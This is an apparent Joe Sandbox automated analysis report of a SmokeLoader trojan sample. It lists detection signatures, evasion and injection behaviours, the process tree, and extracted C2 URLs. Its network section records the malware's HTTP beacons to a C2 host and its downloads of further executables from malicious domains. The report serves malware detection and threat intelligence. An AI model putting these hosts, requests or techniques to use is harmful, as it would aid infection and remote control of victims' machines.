Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report UZ6FEqlix4

Overview

General Information

Sample Name:UZ6FEqlix4 (renamed file extension from none to exe)
Analysis ID:545931
MD5:5e0ed8966761e70ee0b8dcd141aafb4c
SHA1:933e68212d0f6d029e920bd93e5dca7ca5bdcb7a
SHA256:8bbdda1786e15a568a573a2f38762e95de138af969e0a13b96d7086aaa98bfc2
Tags:32exeSmokeLoadertrojan
Infos:

Most interesting Screenshot:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • UZ6FEqlix4.exe (PID: 6160 cmdline: "C:\Users\user\Desktop\UZ6FEqlix4.exe" MD5: 5E0ED8966761E70EE0B8DCD141AAFB4C)
    • UZ6FEqlix4.exe (PID: 6384 cmdline: "C:\Users\user\Desktop\UZ6FEqlix4.exe" MD5: 5E0ED8966761E70EE0B8DCD141AAFB4C)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • 411F.exe (PID: 6684 cmdline: C:\Users\user\AppData\Local\Temp\411F.exe MD5: 5E0ED8966761E70EE0B8DCD141AAFB4C)
          • 411F.exe (PID: 5956 cmdline: C:\Users\user\AppData\Local\Temp\411F.exe MD5: 5E0ED8966761E70EE0B8DCD141AAFB4C)
  • eveggtb (PID: 7080 cmdline: C:\Users\user\AppData\Roaming\eveggtb MD5: 5E0ED8966761E70EE0B8DCD141AAFB4C)
    • eveggtb (PID: 4720 cmdline: C:\Users\user\AppData\Roaming\eveggtb MD5: 5E0ED8966761E70EE0B8DCD141AAFB4C)
  • cleanup

Malware Configuration

Threatname: SmokeLoader

{"C2 list": ["http://host-data-coin-11.com/", "http://file-coin-host-12.com/"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.733146103.0000000000540000.00000004.00000001.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    0000000B.00000002.781213827.00000000005A1000.00000004.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000001.00000002.733351124.0000000002051000.00000004.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        00000005.00000000.720297741.0000000004F41000.00000020.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          0000000B.00000002.781100610.0000000000460000.00000004.00000001.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000001.00000002.733146103.0000000000540000.00000004.00000001.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://host-data-coin-11.com/", "http://file-coin-host-12.com/"]}
            Multi AV Scanner detection for submitted fileShow sources
            Source: UZ6FEqlix4.exeVirustotal: Detection: 58%Perma Link
            Source: UZ6FEqlix4.exeMetadefender: Detection: 20%Perma Link
            Source: UZ6FEqlix4.exeReversingLabs: Detection: 62%
            Antivirus detection for URL or domainShow sources
            Source: http://unicupload.top/install5.exeURL Reputation: Label: phishing
            Source: http://privacytools-foryou-777.com/downloads/toolspab3.exeAvira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URLShow sources
            Source: unicupload.topVirustotal: Detection: 15%Perma Link
            Source: host-data-coin-11.comVirustotal: Detection: 13%Perma Link
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\411F.exeMetadefender: Detection: 20%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\411F.exeReversingLabs: Detection: 67%
            Source: C:\Users\user\AppData\Roaming\eveggtbMetadefender: Detection: 20%Perma Link
            Source: C:\Users\user\AppData\Roaming\eveggtbReversingLabs: Detection: 67%
            Machine Learning detection for sampleShow sources
            Source: UZ6FEqlix4.exeJoe Sandbox ML: detected
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\eveggtbJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\411F.exeJoe Sandbox ML: detected
            Source: UZ6FEqlix4.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: Binary string: "C:\sigut-wo.pdb source: UZ6FEqlix4.exe, eveggtb.5.dr, 411F.exe.5.dr
            Source: Binary string: C:\sigut-wo.pdb source: UZ6FEqlix4.exe, eveggtb.5.dr, 411F.exe.5.dr
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 0_2_0041CA09 __wremove,__wrename,SetCurrentDirectoryW,EnterCriticalSection,GlobalAddAtomW,UnlockFile,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointA,GetCompressedFileSizeW,FillConsoleOutputCharacterA,SetNamedPipeHandleState,lstrcpynA,FatalAppExitA,GetConsoleAliasesLengthA,GetProcessTimes,ChangeTimerQueueTimer,SetWaitableTimer,VirtualLock,GetSystemPowerStatus,SignalObjectAndWait,WaitForMultipleObjectsEx,OpenMutexA,GetLastError,HeapValidate,GetComputerNameW,OpenMutexW,FreeEnvironmentStringsA,TlsAlloc,ClearCommBreak,GetConsoleScreenBufferInfo,OpenSemaphoreA,FreeEnvironmentStringsA,GetWriteWatch,DeleteTimerQueueTimer,GetDevicePowerState,ProcessIdToSessionId,EnumSystemLocalesW,GetSystemTimeAdjustment,SetCommState,LocalShrink,WriteConsoleInputW,GetConsoleAliasExesLengthW,FreeConsole,SearchPathW,FlushConsoleInputBuffer,GetVolumePathNameA,GetConsoleCP,MoveFileExA,LockFileEx,ReplaceFileA,lstrcpyA,SetFileShortNameA,GetThreadLocale,CreateSemaphoreA,TryEnterCriticalSection,FreeEnvironmentStringsA,CreateSemaphoreA,SetLocalTime,FindResourceExA,GetQueuedCompletionStatus,CreateSemaphoreA,GetNumberFormatW,PeekConsoleInputA,CreateIoCompletionPort,GetProcAddress,HeapUnlock,GetFileAttributesExW,GetPrivateProfileStructW,TryEnterCriticalSection,GetPrivateProfileStructA,WritePrivateProfileSectionW,GetPrivateProfileSectionW,SetSystemTimeAdjustment,InterlockedIncrement,WriteConsoleW,EndUpdateResourceA,DefineDosDeviceW,TryEnterCriticalSection,InterlockedExchange,SetFirmwareEnvironmentVariableA,CreateActCtxA,lstrcatW,WriteProfileStringA,TerminateThread,GetSystemWow64DirectoryA,GetConsoleMode,WriteFile,lstrcmpA,FindFirstFileA,DebugBreak,GetStringTypeA,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: 0_2_0041AA72 TryEnterCriticalSection,BuildCommDCBAndTimeoutsA,GetNamedPipeHandleStateA,ReleaseMutex,AddAtomA,TzSpecificLocalTimeToSystemTime,SetConsoleCursorInfo,VerifyVersionInfoW,TlsGetValue,CopyFileA,GetLongPathNameA,SetVolumeMountPointW,GetProcessPriorityBoost,FreeEnvironmentStringsA,VerifyVersionInfoA,FindFirstFileExA,

            Networking:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: unicupload.top
            Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
            Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
            Source: C:\Windows\explorer.exeDomain query: infinity-cheats.com
            Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
            Source: C:\Windows\explorer.exeDomain query: privacytools-foryou-777.com
            Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: http://host-data-coin-11.com/
            Source: Malware configuration extractorURLs: http://file-coin-host-12.com/
            Source: Joe Sandbox ViewASN Name: SUPERSERVERSDATACENTERRU SUPERSERVERSDATACENTERRU
            Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
            Source: Joe Sandbox ViewIP Address: 185.233.81.115 185.233.81.115
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:56:02 GMTContent-Type: application/x-msdos-programContent-Length: 339456Connection: closeLast-Modified: Tue, 28 Dec 2021 12:56:02 GMTETag: W/"52e00-5d43457ecb7e9"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 04 b7 bc 92 40 d6 d2 c1 40 d6 d2 c1 40 d6 d2 c1 2f a0 4c c1 51 d6 d2 c1 2f a0 78 c1 2a d6 d2 c1 49 ae 41 c1 43 d6 d2 c1 40 d6 d3 c1 fd d6 d2 c1 2f a0 79 c1 76 d6 d2 c1 2f a0 48 c1 41 d6 d2 c1 2f a0 4f c1 41 d6 d2 c1 52 69 63 68 40 d6 d2 c1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 1b b4 65 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ee 03 00 00 20 09 00 00 00 00 00 b0 3d 02 00 00 10 00 00 00 00 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 0d 00 00 04 00 00 93 13 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc eb 03 00 28 00 00 00 00 90 0c 00 88 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 24 21 00 00 70 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 a5 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4e ed 03 00 00 10 00 00 00 ee 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 68 6f 08 00 00 00 04 00 00 8c 00 00 00 f2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 65 6a 65 76 75 00 05 00 00 00 00 70 0c 00 00 02 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 6f 7a 69 00 00 00 93 0d 00 00 00 80 0c 00 00 0e 00 00 00 80 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 62 00 00 00 90 0c 00 00 64 00 00 00 8e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ee 3b 00 00 00 00 0d 00 00 3c 00 00 00 f2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dbbxvwuoso.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: host-data-coin-11.com
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yawyilmlp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: host-data-coin-11.com
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oabgiwp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: host-data-coin-11.com
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hwrkvn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: host-data-coin-11.com
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oskoy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: host-data-coin-11.com
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yhvtxw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: host-data-coin-11.com
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kfdyfm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: host-data-coin-11.com
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jealulibe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: host-data-coin-11.com
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://axnxlm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: host-data-coin-11.com
            Source: global trafficHTTP traffic detected: GET /files/5376_1640094939_1074.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mgnuugce.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 143Host: host-data-coin-11.com
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kctmodtvj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: host-data-coin-11.com
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lspsrkslr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: host-data-coin-11.com
            Source: global trafficHTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytools-foryou-777.com
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://clunuonr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: host-data-coin-11.com
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pebbfc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: host-data-coin-11.com
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xkoocu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: host-data-coin-11.com
            Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xpkuvjioi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 144Host: host-data-coin-11.com
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nxjfh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: host-data-coin-11.com
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ithwflphmf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: host-data-coin-11.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f7 1b b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0
